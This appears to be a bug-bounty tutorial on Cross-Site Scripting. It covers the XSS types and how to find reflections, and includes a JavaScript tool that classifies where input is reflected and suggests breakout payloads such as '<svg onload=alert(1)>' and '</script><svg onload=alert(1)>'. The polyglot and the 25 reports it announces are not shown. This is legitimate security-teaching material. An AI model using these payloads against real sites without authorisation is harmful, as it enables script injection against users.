In this article, we will discuss the Cross-Site Scripting (XSS) vulnerability class, how to find it, and present 25 disclosed reports based on this issue.
What is XSS?
Cross-Site Scripting is an injection vulnerability: attacker-controlled input ends up in a page's HTML or JavaScript without proper output encoding, so the victim's browser executes it with the origin of the vulnerable site. Because the script runs in that origin, it can read cookies that are not marked HttpOnly, perform actions on behalf of the victim, and rewrite the page content.
Types of XSS
- Stored/Persistent XSS: the malicious script is saved by the application, for example in a comment section, and is served to every user who later views the affected page.
- Reflected/Non-persistent XSS: the malicious script is sent in the request, for example in a search query, and echoed back in the immediate response, so the victim has to be lured into opening a crafted link or submitting a crafted form.
- DOM-based/Client-side XSS: client-side JavaScript takes attacker-controlled data from a source such as location.hash or document.referrer and writes it to a dangerous sink such as innerHTML or eval(); the server's response is not modified, and when the source is the URL fragment the payload never reaches the server at all.
- Self-XSS: the victim is tricked into running the malicious script themselves, for example by pasting it into the browser's developer console; because it relies on social engineering rather than a flaw in the application, most bug bounty programs treat it as out of scope.
How to find XSS in a bug bounty program
First, identify all the user inputs in the application: URL parameters, form fields, HTTP headers such as Referer and User-Agent, file names, and anything that is stored and displayed later. Then play with them. Send a harmless unique marker, find where it is reflected and in which context (HTML text, attribute value, JavaScript string, URL), then send the characters a payload needs in that context and see how the server treats them. Try to bypass restrictions such as tag removal, HTML encoding or character blacklisting.
Also, inject some XSS polyglots, payloads crafted to execute in several contexts at once, like this:
I will provide some links to lists of payloads like the one above.
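The procedure above, as an added example that is not code from the original article: a JavaScript helper (runs under Node, no dependencies) that takes the response body returned after submitting a probe made of a unique canary followed by the characters a payload needs, finds every reflection of the canary, classifies the syntactic context each one landed in, and records whether each special character was kept, HTML-encoded, backslash-escaped, percent-encoded or stripped. The canary value, the probe, the function names and the sample response are all my own constructions for this example.

```javascript
// Added example, not code from the original article. Given the response body
// returned after submitting PROBE (a unique canary followed by the characters
// an XSS payload needs), find each reflection, classify its syntactic context
// and record what the server did to every special character.
// SAMPLE_RESPONSE below is constructed for this example.

const CANARY = "zxq7kq";                  // alphanumeric, survives almost any filter
const SPECIALS = ['"', "'", "<", ">", "/"];
const PROBE = CANARY + SPECIALS.join("");  // what you would submit: zxq7kq"'<>/

const HTML_ENTITIES = {
  '"': ["&quot;", "&#34;", "&#x22;"], "'": ["&#39;", "&#x27;", "&apos;"],
  "<": ["&lt;", "&#60;", "&#x3c;"],   ">": ["&gt;", "&#62;", "&#x3e;"],
  "/": ["&#47;", "&#x2f;"],
};
const PERCENT = { '"': "%22", "'": "%27", "<": "%3C", ">": "%3E", "/": "%2F" };

// Last occurrence of needle that ends at or before pos, or -1.
function lastBefore(text, needle, pos) {
  return pos < needle.length ? -1 : text.lastIndexOf(needle, pos - needle.length);
}

// Walk the text right after the canary and decide, in order, what happened to
// each special character. Anything unrecognised means the character was stripped.
function diagnoseFilter(body, canaryPos) {
  let pos = canaryPos + CANARY.length;
  const result = {};
  for (const ch of SPECIALS) {
    const entity = HTML_ENTITIES[ch].find((e) => body.startsWith(e, pos));
    if (body.startsWith(ch, pos)) { result[ch] = "kept"; pos += 1; }
    else if (body.startsWith("\\" + ch, pos)) { result[ch] = "backslash-escaped"; pos += 2; }
    else if (entity) { result[ch] = "html-encoded"; pos += entity.length; }
    else if (body.slice(pos, pos + 3).toUpperCase() === PERCENT[ch]) { result[ch] = "percent-encoded"; pos += 3; }
    else result[ch] = "stripped";
  }
  return result;
}

// Inside <script>: is the reflection point within a string literal?
// Simplified tokenizer: ignores JS comments and regex literals.
function jsContext(code) {
  let quote = null;
  for (let i = 0; i < code.length; i++) {
    const c = code[i];
    if (quote) { if (c === "\\") i++; else if (c === quote) quote = null; }
    else if (c === '"' || c === "'" || c === "`") quote = c;
  }
  return quote ? { context: "js-string", quote } : { context: "js-code" };
}

// Inside a tag: small state machine over the attributes preceding the reflection.
function tagContext(tag) {
  const m = /^<\/?([a-zA-Z][\w:-]*)/.exec(tag);
  const tagName = m ? m[1].toLowerCase() : "";
  let state = "between", attr = "", quote = null;
  for (let i = m ? m[0].length : 1; i < tag.length; i++) {
    const c = tag[i], ws = /\s/.test(c);
    if (state === "between") { if (!ws) { state = "name"; attr = c; } }
    else if (state === "name") { if (c === "=") state = "eq"; else if (ws) state = "after-name"; else attr += c; }
    else if (state === "after-name") { if (c === "=") state = "eq"; else if (!ws) { state = "name"; attr = c; } }
    else if (state === "eq") { if (ws) continue; if (c === '"' || c === "'") { state = "quoted"; quote = c; } else state = "unquoted"; }
    else if (state === "quoted") { if (c === quote) { state = "between"; quote = null; attr = ""; } }
    else if (state === "unquoted") { if (ws) { state = "between"; attr = ""; } }
  }
  if (state === "eq") state = "unquoted";   // reflection is the first character of an unquoted value
  if (state !== "quoted" && state !== "unquoted") return { context: "tag-internals", tag: tagName };
  const attribute = attr.toLowerCase();
  return { context: state === "quoted" ? "attribute-value" : "attribute-value-unquoted",
           tag: tagName, attribute, quote, eventHandler: attribute.startsWith("on"),
           urlAttribute: ["href", "src", "action", "formaction"].includes(attribute) };
}

function classifyContext(body, pos) {
  const lower = body.toLowerCase();
  const scriptOpen = lastBefore(lower, "<script", pos);
  if (scriptOpen > lastBefore(lower, "</script", pos)) {
    const codeStart = lower.indexOf(">", scriptOpen) + 1;   // end of the <script ...> tag
    if (codeStart > 0 && codeStart <= pos) return jsContext(body.slice(codeStart, pos));
  }
  if (lastBefore(body, "<!--", pos) > lastBefore(body, "-->", pos)) return { context: "html-comment" };
  const lt = lastBefore(body, "<", pos);
  if (lt > lastBefore(body, ">", pos)) return tagContext(body.slice(lt, pos));
  return { context: "html-text" };
}

// A first breakout attempt that fits the context and the characters that survived.
function suggest(ctx, filter) {
  const kept = (...chars) => chars.every((c) => filter[c] === "kept");
  switch (ctx.context) {
    case "html-text": return kept("<", ">") ? "<svg onload=alert(1)>" : "angle brackets neutralized; not exploitable as-is";
    case "html-comment": return kept("<", ">") ? "--><svg onload=alert(1)>" : "angle brackets neutralized; not exploitable as-is";
    case "attribute-value":
      if (ctx.eventHandler) return "already inside a JS event handler: try alert(1) directly";
      if (kept(ctx.quote)) return `${ctx.quote} autofocus onfocus=alert(1) x=${ctx.quote}`;
      return `quote ${ctx.quote} is ${filter[ctx.quote]}; cannot close the attribute`;
    case "attribute-value-unquoted": return " autofocus onfocus=alert(1)";
    case "js-string":
      if (kept(ctx.quote)) return `${ctx.quote};alert(1);//`;
      if (kept("<", "/", ">")) return "</script><svg onload=alert(1)>";   // the HTML parser ends the script element first
      return `quote ${ctx.quote} is ${filter[ctx.quote]}; try another reflection`;
    case "js-code": return "alert(1)//";
    default: return "inspect manually";
  }
}

function analyze(body) {
  const findings = [];
  for (let pos = body.indexOf(CANARY); pos !== -1; pos = body.indexOf(CANARY, pos + CANARY.length)) {
    const ctx = classifyContext(body, pos);
    const filter = diagnoseFilter(body, pos);
    findings.push({ offset: pos, ...ctx, filter, suggestion: suggest(ctx, filter) });
  }
  return findings;
}

// Constructed response to a request that carried PROBE in the "q" parameter.
const SAMPLE_RESPONSE = [
  "<html><body>",
  `<p>You searched for ${CANARY}&quot;&#39;&lt;&gt;/</p>`,            // fully entity-encoded
  `<input type="text" name="q" value="${CANARY}&quot;'<>/">`,         // only the double quote is encoded
  `<script>var lastQuery = "${CANARY}\\"'<>/";</script>`,             // quote escaped, <>/ untouched
  `<a href="/search?q=${CANARY}%22%27%3C%3E%2F">Search again</a>`,    // percent-encoded inside a URL
  "</body></html>",
].join("\n");

console.log(`probe sent: ${PROBE}`);
for (const f of analyze(SAMPLE_RESPONSE)) console.log(JSON.stringify(f));
```

On the sample, the first reflection is entity-encoded HTML text and is a dead end, the second sits in a double-quoted attribute whose quote is encoded (the literal `<>` that survived do nothing there), the third is a JavaScript string where the quote is backslash-escaped but `</script>` still closes the element, and the fourth is percent-encoded inside an href. The suggestions are first attempts only; the context is what decides the payload, which is why step one is locating and classifying reflections rather than throwing `<script>alert(1)</script>` at every field. In practice, fetch the body with the same session cookies the application uses, since authenticated pages often reflect input that anonymous ones do not.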
Top 25 XSS Bug Bounty Reports
The reports were disclosed through the HackerOne platform and were selected according to their upvotes, bounty, severity level, complexity, and uniqueness.